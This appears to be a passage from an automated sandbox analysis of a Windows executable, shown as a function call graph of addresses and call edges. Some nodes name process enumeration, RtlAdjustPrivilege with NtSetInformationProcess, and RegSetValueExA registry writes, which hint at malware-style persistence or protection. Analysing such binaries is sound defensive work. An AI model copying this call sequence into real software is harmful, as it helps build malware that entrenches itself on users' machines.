7ff68a185dae 15413->15414 15415 7ff68a185df6 15414->15415 15416 7ff68a183d3c 70 API calls 15414->15416 15417 7ff68a183c1c 70 API calls 15415->15417 15416->15415 15419 7ff68a185e25 15417->15419 15418 7ff68a185e6d 15421 7ff68a183c1c 70 API calls 15418->15421 15419->15418 15420 7ff68a183d3c 70 API calls 15419->15420 15420->15418 15422 7ff68a185e99 15421->15422 15423 7ff68a185ee1 15422->15423 15424 7ff68a183d3c 70 API calls 15422->15424 15425 7ff68a183c1c 70 API calls 15423->15425 15424->15423 15427 7ff68a185f10 15425->15427 15426 7ff68a185f58 15429 7ff68a183c1c 70 API calls 15426->15429 15427->15426 15428 7ff68a183d3c 70 API calls 15427->15428 15428->15426 15430 7ff68a185f87 15429->15430 15431 7ff68a185fcf 15430->15431 15432 7ff68a183d3c 70 API calls 15430->15432 15433 7ff68a183c1c 70 API calls 15431->15433 15432->15431 15434 7ff68a185ffe 15433->15434 15435 7ff68a186046 15434->15435 15436 7ff68a183d3c 70 API calls 15434->15436 15437 7ff68a183c1c 70 API calls 15435->15437 15436->15435 15439 7ff68a186072 15437->15439 15438 7ff68a1860ba 15440 7ff68a183c1c 70 API calls 15438->15440 15439->15438 15441 7ff68a183d3c 70 API calls 15439->15441 15442 7ff68a1860e9 15440->15442 15441->15438 15443 7ff68a186131 15442->15443 15444 7ff68a183d3c 70 API calls 15442->15444 15445 7ff68a183c1c 70 API calls 15443->15445 15444->15443 15447 7ff68a186160 15445->15447 15446 7ff68a1861a8 15449 7ff68a183c1c 70 API calls 15446->15449 15447->15446 15448 7ff68a183d3c 70 API calls 15447->15448 15448->15446 15450 7ff68a1861d7 15449->15450 15451 7ff68a18621f 15450->15451 15452 7ff68a183d3c 70 API calls 15450->15452 15453 7ff68a183c1c 70 API calls 15451->15453 15452->15451 15454 7ff68a18624e 15453->15454 15455 7ff68a186296 15454->15455 15456 7ff68a183d3c 70 API calls 15454->15456 15457 7ff68a183c1c 70 API calls 15455->15457 15456->15455 15459 7ff68a1862c5 15457->15459 15458 7ff68a18630d 15461 7ff68a183c1c 70 API calls 15458->15461 15459->15458 15460 7ff68a183d3c 70 API calls 15459->15460 15460->15458 15462 7ff68a18633c 15461->15462 15463 7ff68a186384 15462->15463 15464 7ff68a183d3c 70 API calls 15462->15464 15465 7ff68a183c1c 70 API calls 15463->15465 15464->15463 15467 7ff68a1863b3 15465->15467 15466 7ff68a1863fb 15468 7ff68a183c1c 70 API calls 15466->15468 15467->15466 15469 7ff68a183d3c 70 API calls 15467->15469 15470 7ff68a186427 15468->15470 15469->15466 15471 7ff68a18646f 15470->15471 15472 7ff68a183d3c 70 API calls 15470->15472 15473 7ff68a183c1c 70 API calls 15471->15473 15472->15471 15474 7ff68a18649e 15473->15474 15475 7ff68a1864e6 15474->15475 15476 7ff68a183d3c 70 API calls 15474->15476 15477 7ff68a183c1c 70 API calls 15475->15477 15476->15475 15479 7ff68a186512 15477->15479 15478 7ff68a18655a 15481 7ff68a183c1c 70 API calls 15478->15481 15479->15478 15480 7ff68a183d3c 70 API calls 15479->15480 15480->15478 15482 7ff68a186589 15481->15482 15483 7ff68a1865d1 15482->15483 15484 7ff68a183d3c 70 API calls 15482->15484 15485 7ff68a183c1c 70 API calls 15483->15485 15484->15483 15486 7ff68a1865fd 15485->15486 15487 7ff68a186645 15486->15487 15488 7ff68a183d3c 70 API calls 15486->15488 15489 7ff68a183c1c 70 API calls 15487->15489 15488->15487 15491 7ff68a186674 15489->15491 15490 7ff68a1866bc 15493 7ff68a183c1c 70 API calls 15490->15493 15491->15490 15492 7ff68a183d3c 70 API calls 15491->15492 15492->15490 15494 7ff68a1866eb 15493->15494 15495 7ff68a186733 15494->15495 15496 7ff68a183d3c 70 API calls 15494->15496 15497 7ff68a183c1c 70 API calls 15495->15497 15496->15495 15499 7ff68a186765 15497->15499 15498 7ff68a1867ad 15501 7ff68a183c1c 70 API calls 15498->15501 15499->15498 15500 7ff68a183d3c 70 API calls 15499->15500 15500->15498 15502 7ff68a1867d9 15501->15502 15503 7ff68a186821 15502->15503 15505 7ff68a183d3c 70 API calls 15502->15505 15504 7ff68a183c1c 70 API calls 15503->15504 15507 7ff68a186850 15504->15507 15505->15503 15506 7ff68a186898 15509 7ff68a183c1c 70 API calls 15506->15509 15507->15506 15508 7ff68a183d3c 70 API calls 15507->15508 15508->15506 15510 7ff68a1868c7 15509->15510 15511 7ff68a18690f 15510->15511 15512 7ff68a183d3c 70 API calls 15510->15512 15513 7ff68a183c1c 70 API calls 15511->15513 15512->15511 15514 7ff68a18693e 15513->15514 15515 7ff68a186986 15514->15515 15516 7ff68a183d3c 70 API calls 15514->15516 16298 7ff68a183a60 15515->16298 15516->15515 15518 7ff68a186999 15519 7ff68a1869e1 15518->15519 15520 7ff68a183d3c 70 API calls 15518->15520 15521 7ff68a183a60 70 API calls 15519->15521 15520->15519 15523 7ff68a1869f4 15521->15523 15522 7ff68a186a3c 15525 7ff68a183a60 70 API calls 15522->15525 15523->15522 15524 7ff68a183d3c 70 API calls 15523->15524 15524->15522 15527 7ff68a186a4f 15525->15527 15526 7ff68a186a97 15529 7ff68a183a60 70 API calls 15526->15529 15527->15526 15528 7ff68a183d3c 70 API calls 15527->15528 15528->15526 15530 7ff68a186aaa 15529->15530 15531 7ff68a186af2 15530->15531 15533 7ff68a183d3c 70 API calls 15530->15533 15532 7ff68a183a60 70 API calls 15531->15532 15535 7ff68a186b05 15532->15535 15533->15531 15534 7ff68a186b4d 15537 7ff68a183a60 70 API calls 15534->15537 15535->15534 15536 7ff68a183d3c 70 API calls 15535->15536 15536->15534 15539 7ff68a186b60 15537->15539 15538 7ff68a186ba8 15541 7ff68a183a60 70 API calls 15538->15541 15539->15538 15540 7ff68a183d3c 70 API calls 15539->15540 15540->15538 15542 7ff68a186bbb 15541->15542 15543 7ff68a186c03 15542->15543 15544 7ff68a183d3c 70 API calls 15542->15544 15545 7ff68a183a60 70 API calls 15543->15545 15544->15543 15546 7ff68a186c16 15545->15546 15547 7ff68a186c5e 15546->15547 15548 7ff68a183d3c 70 API calls 15546->15548 15549 7ff68a183a60 70 API calls 15547->15549 15548->15547 15551 7ff68a186c71 15549->15551 15550 7ff68a186cb9 15553 7ff68a183a60 70 API calls 15550->15553 15551->15550 15552 7ff68a183d3c 70 API calls 15551->15552 15552->15550 15554 7ff68a186ccc 15553->15554 15555 7ff68a183aa4 70 API calls 15554->15555 15556 7ff68a186cfe 15554->15556 15555->15556 15557 7ff68a183aa4 70 API calls 15556->15557 15558 7ff68a186d31 15556->15558 15557->15558 15559 7ff68a183aa4 70 API calls 15558->15559 15560 7ff68a186d62 15558->15560 15559->15560 15561 7ff68a183aa4 70 API calls 15560->15561 15562 7ff68a186d93 15560->15562 15561->15562 15563 7ff68a183aa4 70 API calls 15562->15563 15564 7ff68a186dc4 15562->15564 15563->15564 15565 7ff68a183aa4 70 API calls 15564->15565 15566 7ff68a186df5 15564->15566 15565->15566 15567 7ff68a183aa4 70 API calls 15566->15567 15569 7ff68a186e23 15566->15569 15567->15569 15568 7ff68a186e54 15571 7ff68a183a60 70 API calls 15568->15571 15569->15568 15570 7ff68a183aa4 70 API calls 15569->15570 15570->15568 15572 7ff68a186e67 15571->15572 15573 7ff68a186eaf 15572->15573 15574 7ff68a183d3c 70 API calls 15572->15574 15575 7ff68a183aa4 70 API calls 15573->15575 15574->15573 15576 7ff68a186ec2 15575->15576 15577 7ff68a183d3c 70 API calls 15576->15577 15578 7ff68a186edb 15577->15578 15579 7ff68a189a38 162 API calls 15578->15579 15580 7ff68a186f64 15579->15580 15581 7ff68a186fbf 15580->15581 15583 7ff68a18aab0 70 API calls 15580->15583 15582 7ff68a189b3c 96 API calls 15581->15582 15582->15398 15584 7ff68a186f81 15583->15584 15585 7ff68a18a31c _RunAllParam 96 API calls 15584->15585 15586 7ff68a186f8d 15585->15586 15586->15581 15587 7ff68a1812fc 70 API calls 15586->15587 15587->15581 16310 7ff68a187530 CreateToolhelp32Snapshot 15588->16310 15591 7ff68a187530 73 API calls 15592 7ff68a18842c 15591->15592 15593 7ff68a188468 RtlAdjustPrivilege NtSetInformationProcess 15592->15593 15595 7ff68a188436 RtlAdjustPrivilege NtSetInformationProcess 15592->15595 16320 7ff68a1875e4 15593->16320 15597 7ff68a188545 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15595->15597 15596 7ff68a1884aa _cftof2_l 16330 7ff68a187838 15596->16330 15598 7ff68a187530 73 API calls 15597->15598 15599 7ff68a188563 15598->15599 15601 7ff68a1885b9 15599->15601 15602 7ff68a18856c 15599->15602 15605 7ff68a187530 73 API calls 15601->15605 15603 7ff68a1885b7 15602->15603 15606 7ff68a181808 70 API calls 15602->15606 15608 7ff68a187530 73 API calls 15603->15608 15605->15603 15609 7ff68a1885a0 15606->15609 15607 7ff68a188505 RegSetValueExA RegCloseKey 15607->15597 15610 7ff68a1885db 15608->15610 16336 7ff68a1820c0 15609->16336 15613 7ff68a1885e4 15610->15613 15614 7ff68a18863b 15610->15614 15616 7ff68a188639 15613->15616 15617 7ff68a1885ed Sleep 15613->15617 15615 7ff68a187530 73 API calls 15614->15615 15615->15616 15618 7ff68a187530 73 API calls 15616->15618 15619 7ff68a181808 70 API calls 15617->15619 15620 7ff68a18865d 15618->15620 15621 7ff68a188622 15619->15621 15622 7ff68a188661 15620->15622 15623 7ff68a1886b8 15620->15623 15624 7ff68a1820c0 85 API calls 15621->15624 15625 7ff68a18866a Sleep 15622->15625 15629 7ff68a1886b6 15622->15629 15626 7ff68a187530 73 API calls 15623->15626 15624->15616 15628 7ff68a181808 70 API calls 15625->15628 15626->15629 15627 7ff68a18bb20 _expandlocale 9 API calls 15630 7ff68a1886da 15627->15630 15631 7ff68a18869f 15628->15631 15629->15627 15630->14518 15632 7ff68a1820c0 85 API calls 15631->15632 15632->15629 15668 7ff68a185264 GetSystemDirectoryW 15633->15668 15639 7ff68a18564e std::ios_base::_Ios_base_dtor std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15640 7ff68a18bb20 _expandlocale 9 API calls 15639->15640 15641 7ff68a185685 15640->15641 15641->15363 15643 7ff68a1853f3 15644 7ff68a1854ce 15643->15644 15656 7ff68a185404 std::ios_base::_Ios_base_dtor std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 15643->15656 15685 7ff68a18a800 15643->15685 15700 7ff68a18b46c 15643->15700 15708 7ff68a18a31c 15644->15708 15647 7ff68a18550f 15647->15656 15714 7ff68a189a38 15647->15714 15648 7ff68a1812fc 70 API calls 15648->15647 15651 7ff68a18557c 15723 7ff68a189b3c 15651->15723 15652 7ff68a18559a 15726 7ff68a18aab0 15652->15726 15742 7ff68a188f3c 15656->15742 15659 7ff68a18aab0 70 API calls 15660 7ff68a1855c0 15659->15660 15661 7ff68a18ad00 70 API calls 15660->15661 15662 7ff68a1855cf 15661->15662 15663 7ff68a18a31c _RunAllParam 96 API calls 15662->15663 15664 7ff68a1855d8 15663->15664 15665 7ff68a185604 15664->15665 15666 7ff68a1812fc 70 API calls 15664->15666 15667 7ff68a189b3c 96 API calls 15665->15667 15666->15665 15667->15656 15669 7ff68a1852c2 15668->15669 15670 7ff68a183c1c 70 API calls 15669->15670 15671 7ff68a1852e7 15670->15671 15672 7ff68a183aa4 70 API calls 15671->15672 15673 7ff68a1852fe 15672->15673 15674 7ff68a18bb20 _expandlocale 9 API calls 15673->15674 15675 7ff68a185311 15674->15675 15676 7ff68a188e30 15675->15676 15745 7ff68a18a63c 15676->15745 15683 7ff68a188f27 15683->15643 15684 7ff68a1812fc 70 API calls 15684->15683 15686 7ff68a19cad4 std::_Lockit::_Lockit 68 API calls 15685->15686 15687 7ff68a18a83a 15686->15687 15688 7ff68a1843d4 68 API calls 15687->15688 15689 7ff68a18a853 15688->15689 15690 7ff68a18a896 std::ios_base::_Addstd 15689->15690 16112 7ff68a18494c 15689->16112 15691 7ff68a18bb20 _expandlocale 9 API calls 15690->15691 15693 7ff68a18a909 15691->15693 15693->15643 15695 7ff68a18a8d0 15699 7ff68a19c690 std::_Facet_Register 70 API calls 15695->15699 15696 7ff68a18bb64 std::bad_exception::bad_exception 68 API calls 15697 7ff68a18a8bf 15696->15697 15698 7ff68a190fe0 _CxxThrowException 2 API calls 15697->15698 15698->15695 15699->15690 15701 7ff68a18b4c2 15700->15701 16156 7ff68a189dd8 15701->16156 15703 7ff68a18b609 15703->15643 15704 7ff68a1812fc 70 API calls 15704->15703 15705 7ff68a18b4d1 15706 7ff68a18b52f 15705->15706 15707 7ff68a18a6f8 70 API calls 15705->15707 15706->15703 15706->15704 15707->15705 15709 7ff68a1854dd 15708->15709 15710 7ff68a18a33d 15708->15710 15709->15647 15709->15648 16162 7ff68a18a3e8 15710->16162 15713 7ff68a18ee30 fclose 94 API calls 15713->15709 15715 7ff68a18a63c 98 API calls 15714->15715 15716 7ff68a189ab9 15715->15716 15717 7ff68a18a084 75 API calls 15716->15717 15718 7ff68a189ae5 15717->15718 15719 7ff68a18a198 157 API calls 15718->15719 15720 7ff68a189b01 15719->15720 15721 7ff68a1812fc 70 API calls 15720->15721 15722 7ff68a185575 15720->15722 15721->15722 15722->15651 15722->15652 16269 7ff68a188fb4 15723->16269 15725 7ff68a189b7c 15725->15656 15727 7ff68a18aaf2 15726->15727 15728 7ff68a181688 70 API calls 15727->15728 15729 7ff68a18ab35 15727->15729 15728->15729 15730 7ff68a1812fc 70 API calls 15729->15730 15732 7ff68a18acbe 15729->15732 15730->15732 15731 7ff68a1855a6 15734 7ff68a18ad00 15731->15734 15732->15731 15733 7ff68a181908 70 API calls 15732->15733 15733->15731 15735 7ff68a18ad3a 15734->15735 15736 7ff68a181688 70 API calls 15735->15736 15741 7ff68a18ada0 15735->15741 15736->15741 15737 7ff68a1812fc 70 API calls 15738 7ff68a18af1b 15737->15738 15739 7ff68a1855b5 15738->15739 15740 7ff68a181908 70 API calls 15738->15740 15739->15659 15740->15739 15741->15737 15741->15738 15743 7ff68a188fb4 _RunAllParam 96 API calls 15742->15743 15744 7ff68a188f7c 15743->15744 15744->15639 15763 7ff68a184eb0 15745->15763 15747 7ff68a18a65b 15748 7ff68a18a800 93 API calls 15747->15748 15749 7ff68a18a67a 15748->15749 15750 7ff68a188eb5 15749->15750 15751 7ff68a1812fc 70 API calls 15749->15751 15752 7ff68a18a084 15750->15752 15751->15750 15753 7ff68a18c51c std::_Facet_Register 70 API calls 15752->15753 15754 7ff68a18a0aa 15753->15754 15755 7ff68a188ee1 15754->15755 15756 7ff68a19c6cc std::locale::_Init 75 API calls 15754->15756 15757 7ff68a18a198 15755->15757 15756->15755 15758 7ff68a18a1d4 15757->15758 15759 7ff68a188efd 15757->15759 15803 7ff68a19cc84 15758->15803 15759->15683 15759->15684 15761 7ff68a18a1e2 15761->15759 15813 7ff68a18b1a8 15761->15813 15764 7ff68a1812fc 70 API calls 15763->15764 15765 7ff68a184ef3 15764->15765 15766 7ff68a18c51c std::_Facet_Register 70 API calls 15765->15766 15767 7ff68a184efd 15766->15767 15769 7ff68a184f10 15767->15769 15770 7ff68a19c6cc 15767->15770 15769->15747 15779 7ff68a19cad4 15770->15779 15772 7ff68a19c6ef 15778 7ff68a19c725 std::ios_base::_Addstd 15772->15778 15783 7ff68a19c86c 15772->15783 15778->15769 15780 7ff68a19cae3 15779->15780 15781 7ff68a19caeb 15779->15781 15782 7ff68a193d0c _lock 68 API calls 15780->15782 15781->15772 15782->15781 15784 7ff68a18c51c std::_Facet_Register 70 API calls 15783->15784 15785 7ff68a19c883 15784->15785 15786 7ff68a19c703 15785->15786 15787 7ff68a19c5c0 _Yarn 68 API calls 15785->15787 15788 7ff68a19c8d8 15786->15788 15787->15786 15789 7ff68a19c8ea 15788->15789 15790 7ff68a19c70e 15788->15790 15798 7ff68a19d2b8 15789->15798 15792 7ff68a19c5c0 15790->15792 15793 7ff68a19c5dd 15792->15793 15797 7ff68a19c60c _expandlocale 15792->15797 15794 7ff68a19c5e7 15793->15794 15795 7ff68a18c9c8 free 68 API calls 15793->15795 15796 7ff68a18ca08 malloc 68 API calls 15794->15796 15794->15797 15795->15794 15796->15797 15797->15778 15799 7ff68a19d2ef 15798->15799 15800 7ff68a19d2c8 EncodePointer 15798->15800 15801 7ff68a190c78 abort 72 API calls 15799->15801 15800->15790 15802 7ff68a19d2f4 15801->15802 15805 7ff68a19cb88 15803->15805 15804 7ff68a19cbfe 15804->15761 15805->15804 15806 7ff68a19cc1e 15805->15806 15828 7ff68a19f490 15805->15828 15807 7ff68a19f490 _wfsopen 129 API calls 15806->15807 15812 7ff68a19cc23 15806->15812 15809 7ff68a19cc40 15807->15809 15809->15804 15859 7ff68a19f41c 15809->15859 15812->15804 15847 7ff68a18ee30 15812->15847 15814 7ff68a19cad4 std::_Lockit::_Lockit 68 API calls 15813->15814 15815 7ff68a18b1e2 15814->15815 16040 7ff68a1843d4 15815->16040 15817 7ff68a18b23e std::ios_base::_Addstd 15819 7ff68a18bb20 _expandlocale 9 API calls 15817->15819 15818 7ff68a18b1fb 15818->15817 16046 7ff68a1844f8 15818->16046 15821 7ff68a18b2b1 15819->15821 15821->15759 15823 7ff68a18b278 16059 7ff68a19c690 15823->16059 15827 7ff68a190fe0 _CxxThrowException 2 API calls 15827->15823 15829 7ff68a19f4c1 15828->15829 15830 7ff68a19f4d8 15828->15830 15831 7ff68a190908 _errno 68 API calls 15829->15831 15830->15829 15833 7ff68a19f4f3 15830->15833 15832 7ff68a19f4c6 15831->15832 15834 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15832->15834 15872 7ff68a19fe44 15833->15872 15844 7ff68a19f4d1 _ioinitCallback 15834->15844 15844->15806 15848 7ff68a18ee51 15847->15848 15849 7ff68a18ee65 15847->15849 15850 7ff68a190908 _errno 68 API calls 15848->15850 15855 7ff68a18ee61 15849->15855 15924 7ff68a18d650 15849->15924 15851 7ff68a18ee56 15850->15851 15854 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15851->15854 15854->15855 15855->15804 15858 7ff68a18d6ec ungetwc LeaveCriticalSection 15858->15855 15860 7ff68a19f444 15859->15860 15861 7ff68a19f459 15859->15861 15862 7ff68a190908 _errno 68 API calls 15860->15862 15861->15860 15863 7ff68a19f45f 15861->15863 15864 7ff68a19f449 15862->15864 15865 7ff68a18d650 ungetwc 69 API calls 15863->15865 15866 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15864->15866 15867 7ff68a19f464 15865->15867 15868 7ff68a19f454 15866->15868 15974 7ff68a19f370 15867->15974 15868->15812 15871 7ff68a18d6ec ungetwc LeaveCriticalSection 15871->15868 15873 7ff68a193d0c _lock 68 API calls 15872->15873 15880 7ff68a19fe5d 15873->15880 15874 7ff68a19fed9 15903 7ff68a193ef4 LeaveCriticalSection 15874->15903 15875 7ff68a19fee5 15877 7ff68a18f740 _malloc_crt 68 API calls 15875->15877 15879 7ff68a19feef 15877->15879 15879->15874 15881 7ff68a19ff05 InitializeCriticalSectionAndSpinCount EnterCriticalSection 15879->15881 15880->15874 15880->15875 15882 7ff68a193dd8 _mtinitlocknum 68 API calls 15880->15882 15883 7ff68a18d6b8 flsall 69 API calls 15880->15883 15884 7ff68a18d73c flsall LeaveCriticalSection 15880->15884 15881->15874 15882->15880 15883->15880 15884->15880 15925 7ff68a18d6a5 EnterCriticalSection 15924->15925 15926 7ff68a18d665 15924->15926 15926->15925 15927 7ff68a18d671 15926->15927 15928 7ff68a193d0c _lock 68 API calls 15927->15928 15929 7ff68a18d69a 15928->15929 15930 7ff68a18edb4 15929->15930 15931 7ff68a18edc9 15930->15931 15932 7ff68a18eddd 15930->15932 15933 7ff68a190908 _errno 68 API calls 15931->15933 15935 7ff68a18dd00 _flush 89 API calls 15932->15935 15938 7ff68a18edd9 15932->15938 15934 7ff68a18edce 15933->15934 15936 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15934->15936 15937 7ff68a18ede8 15935->15937 15936->15938 15946 7ff68a1954c8 15937->15946 15938->15858 15941 7ff68a193554 _fileno 68 API calls 15942 7ff68a18edfa 15941->15942 15950 7ff68a195b3c 15942->15950 15945 7ff68a18c9c8 free 68 API calls 15945->15938 15947 7ff68a1954d7 15946->15947 15948 7ff68a18edf2 15946->15948 15947->15948 15949 7ff68a18c9c8 free 68 API calls 15947->15949 15948->15941 15949->15948 15951 7ff68a195b55 15950->15951 15952 7ff68a195b6d 15950->15952 15954 7ff68a190898 __doserrno 68 API calls 15951->15954 15953 7ff68a1938bc _ioinit InitOnceExecuteOnce 15952->15953 15960 7ff68a195b72 15953->15960 15955 7ff68a195b5a 15954->15955 15956 7ff68a190908 _errno 68 API calls 15955->15956 15957 7ff68a18ee01 15956->15957 15957->15938 15957->15945 15958 7ff68a195be3 15959 7ff68a190898 __doserrno 68 API calls 15958->15959 15961 7ff68a195be8 15959->15961 15960->15957 15960->15958 15962 7ff68a195bac 15960->15962 15963 7ff68a190908 _errno 68 API calls 15961->15963 15964 7ff68a199fe4 __lock_fhandle 70 API calls 15962->15964 15965 7ff68a195bf0 15963->15965 15966 7ff68a195bb3 15964->15966 15967 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15965->15967 15968 7ff68a195bbf 15966->15968 15969 7ff68a195bca 15966->15969 15967->15957 15970 7ff68a195c0c _close_nolock 72 API calls 15968->15970 15971 7ff68a190908 _errno 68 API calls 15969->15971 15972 7ff68a195bc6 15970->15972 15971->15972 15973 7ff68a19a45c _unlock_fhandle LeaveCriticalSection 15972->15973 15973->15957 15975 7ff68a19f3a3 15974->15975 15976 7ff68a19f393 15974->15976 15978 7ff68a19f3b6 15975->15978 15986 7ff68a19ff78 15975->15986 15977 7ff68a190908 _errno 68 API calls 15976->15977 15985 7ff68a19f398 15977->15985 15980 7ff68a18dd00 _flush 89 API calls 15978->15980 15981 7ff68a19f3c2 15980->15981 15982 7ff68a193554 _fileno 68 API calls 15981->15982 15983 7ff68a19f3ee 15982->15983 16014 7ff68a1a026c 15983->16014 15985->15871 15987 7ff68a19ff9a __crtLCMapStringA_stat 15986->15987 15988 7ff68a19ffcf 15987->15988 15989 7ff68a19ffb7 15987->15989 15991 7ff68a193554 _fileno 68 API calls 15988->15991 15990 7ff68a190908 _errno 68 API calls 15989->15990 15992 7ff68a19ffbc 15990->15992 15993 7ff68a19ffd4 15991->15993 15994 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 15992->15994 15995 7ff68a1a026c _lseek 74 API calls 15993->15995 16013 7ff68a19ffc7 15994->16013 15996 7ff68a19ffee 15995->15996 15999 7ff68a1a0166 15996->15999 16000 7ff68a1a004a 15996->16000 15996->16013 15997 7ff68a18bb20 _expandlocale 9 API calls 15998 7ff68a1a0248 15997->15998 15998->15978 16001 7ff68a1a016a 15999->16001 16004 7ff68a1a013c 15999->16004 16003 7ff68a1a005f 16000->16003 16000->16004 16002 7ff68a190908 _errno 68 API calls 16001->16002 16002->16013 16005 7ff68a1942bc _lseeki64 74 API calls 16003->16005 16003->16013 16007 7ff68a1a026c _lseek 74 API calls 16004->16007 16004->16013 16006 7ff68a1a007b 16005->16006 16008 7ff68a1a0098 ReadFile 16006->16008 16006->16013 16009 7ff68a1a01b0 16007->16009 16010 7ff68a1a00c0 16008->16010 16008->16013 16012 7ff68a1a026c _lseek 74 API calls 16009->16012 16009->16013 16011 7ff68a1a026c _lseek 74 API calls 16010->16011 16011->16013 16012->16013 16013->15997 16015 7ff68a1a028f 16014->16015 16016 7ff68a1a02a7 16014->16016 16017 7ff68a190898 __doserrno 68 API calls 16015->16017 16018 7ff68a1938bc _ioinit InitOnceExecuteOnce 16016->16018 16019 7ff68a1a0294 16017->16019 16020 7ff68a1a02ac 16018->16020 16021 7ff68a190908 _errno 68 API calls 16019->16021 16022 7ff68a1a032b 16020->16022 16023 7ff68a1a029c 16020->16023 16025 7ff68a1a02e6 16020->16025 16021->16023 16024 7ff68a190898 __doserrno 68 API calls 16022->16024 16023->15985 16026 7ff68a1a0330 16024->16026 16027 7ff68a199fe4 __lock_fhandle 70 API calls 16025->16027 16028 7ff68a190908 _errno 68 API calls 16026->16028 16029 7ff68a1a02ed 16027->16029 16030 7ff68a1a0338 16028->16030 16031 7ff68a1a02f9 16029->16031 16032 7ff68a1a030a 16029->16032 16033 7ff68a18fb84 _invalid_parameter_noinfo 16 API calls 16030->16033 16035 7ff68a1a0358 _lseek_nolock 71 API calls 16031->16035 16034 7ff68a190908 _errno 68 API calls 16032->16034 16033->16023 16036 7ff68a1a030f 16034->16036 16037 7ff68a1a0306 16035->16037 16038 7ff68a190898 __doserrno 68 API calls 16036->16038 16039 7ff68a19a45c _unlock_fhandle LeaveCriticalSection 16037->16039 16038->16037 16039->16023 16041 7ff68a1843fe std::ios_base::_Addstd 16040->16041 16042 7ff68a1843f2 16040->16042 16044 7ff68a18bb20 _expandlocale 9 API calls 16041->16044 16043 7ff68a19cad4 std::_Lockit::_Lockit 68 API calls 16042->16043 16043->16041 16045 7ff68a184432 16044->16045 16045->15818 16047 7ff68a18452c 16046->16047 16048 7ff68a18459b 16046->16048 16047->16048 16049 7ff68a18c51c std::_Facet_Register 70 API calls 16047->16049 16048->15823 16056 7ff68a18bb64 16048->16056 16051 7ff68a184539 16049->16051 16050 7ff68a184584 16050->16048 16076 7ff68a18431c 16050->16076 16051->16050 16062 7ff68a184250 16051->16062 16057 7ff68a18bb90 std::exception::exception 68 API calls 16056->16057 16058 7ff68a18b267 16057->16058 16058->15827 16060 7ff68a18c51c std::_Facet_Register 70 API calls 16059->16060 16061 7ff68a19c6a3 16060->16061 16061->15817 16063 7ff68a19cad4 std::_Lockit::_Lockit 68 API calls 16062->16063 16064 7ff68a184284 16063->16064 16065 7ff68a1842f0 16064->16065 16067 7ff68a18bb90 std::exception::exception 68 API calls 16064->16067 16091 7ff68a19c7e4 16065->16091 16069 7ff68a1842d3 16067->16069 16070 7ff68a190fe0 _CxxThrowException 2 API calls 16069->16070 16070->16065 16108 7ff68a19c850 16076->16108 16079 7ff68a184338 16081 7ff68a18434b 16079->16081 16082 7ff68a18c9c8 free 68 API calls 16079->16082 16080 7ff68a18c9c8 free 68 API calls 16080->16079 16083 7ff68a18435e 16081->16083 16084 7ff68a18c9c8 free 68 API calls 16081->16084 16082->16081 16085 7ff68a18c9c8 free 68 API calls 16083->16085 16087 7ff68a184371 16083->16087 16084->16083 16085->16087 16086 7ff68a184384 16089 7ff68a184397 16086->16089 16090 7ff68a18c9c8 free 68 API calls 16086->16090 16087->16086 16088 7ff68a18c9c8 free 68 API calls 16087->16088 16088->16086 16090->16089 16092 7ff68a19f100 std::_Locinfo::_Locinfo_ctor 91 API calls 16091->16092 16093 7ff68a19c7fd 16092->16093 16094 7ff68a19c5c0 _Yarn 68 API calls 16093->16094 16095 7ff68a19c817 16094->16095 16096 7ff68a19c826 16095->16096 16097 7ff68a19f100 std::_Locinfo::_Locinfo_ctor 91 API calls 16095->16097 16097->16096 16109 7ff68a18432a 16108->16109 16110 7ff68a19c85d 16108->16110 16109->16079 16109->16080 16111 7ff68a19f100 std::_Locinfo::_Locinfo_ctor 91 API calls 16110->16111 16111->16109 16113 7ff68a1849fa 16112->16113 16114 7ff68a184980 16112->16114 16113->15695 16113->15696 16114->16113 16115 7ff68a18c51c std::_Facet_Register 70 API calls 16114->16115 16117 7ff68a18498d 16115->16117 16116 7ff68a1849e3 16116->16113 16119 7ff68a18431c std::_Locinfo::~_Locinfo 91 API calls 16116->16119 16117->16116 16118 7ff68a184250 ctype 93 API calls 16117->16118 16120 7ff68a1849c5 16118->16120 16119->16113 16122 7ff68a184a1c 16120->16122 16127 7ff68a19cf60 16122->16127 16125 7ff68a19c4b4 _Getcvt 68 API calls 16126 7ff68a184a58 16125->16126 16126->16116 16141 7ff68a18e0a4 16127->16141 16130 7ff68a18f6c0 _calloc_crt 68 API calls 16131 7ff68a19cf7f 16130->16131 16132 7ff68a19cfa8 16131->16132 16133 7ff68a19cf88 16131->16133 16134 7ff68a19548c __pctype_func 68 API calls 16132->16134 16146 7ff68a19548c 16133->16146 16136 7ff68a19cf8d _expandlocale 16134->16136 16151 7ff68a18e0dc 16136->16151 16139 7ff68a184a2f 16139->16125 16140 7ff68a18c770 _Getctype 68 API calls 16140->16139 16142 7ff68a191f68 _getptd 68 API calls 16141->16142 16143 7ff68a18e0ad 16142->16143 16144 7ff68a18e0d0 16143->16144 16145 7ff68a191474 __updatetlocinfo 68 API calls 16143->16145 16144->16130 16145->16144 16147 7ff68a191f68 _getptd 68 API calls 16146->16147 16148 7ff68a195495 16147->16148 16149 7ff68a1954b8 16148->16149 16150 7ff68a191474 __updatetlocinfo 68 API calls 16148->16150 16149->16136 16150->16149 16152 7ff68a191f68 _getptd 68 API calls 16151->16152 16153 7ff68a18e0e5 16152->16153 16154 7ff68a18e108 16153->16154 16155 7ff68a191474 __updatetlocinfo 68 API calls 16153->16155 16154->16139 16154->16140 16155->16154 16157 7ff68a189e08 16156->16157 16158 7ff68a189dfa 16156->16158 16159 7ff68a1812fc 70 API calls 16157->16159 16161 7ff68a189e18 16157->16161 16158->16157 16160 7ff68a181688 70 API calls 16158->16160 16159->16161 16160->16157 16161->15705 16165 7ff68a18a428 16162->16165 16169 7ff68a18a446 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 16162->16169 16163 7ff68a18bb20 _expandlocale 9 API calls 16164 7ff68a18a342 16163->16164 16164->15713 16165->16169 16171 7ff68a18a574 16165->16171 16167 7ff68a18a46c 16167->16169 16181 7ff68a18ed24 16167->16181 16194 7ff68a182610 16167->16194 16169->16163 16172 7ff68a18a58f 16171->16172 16173 7ff68a18a621 16171->16173 16175 7ff68a18a62d 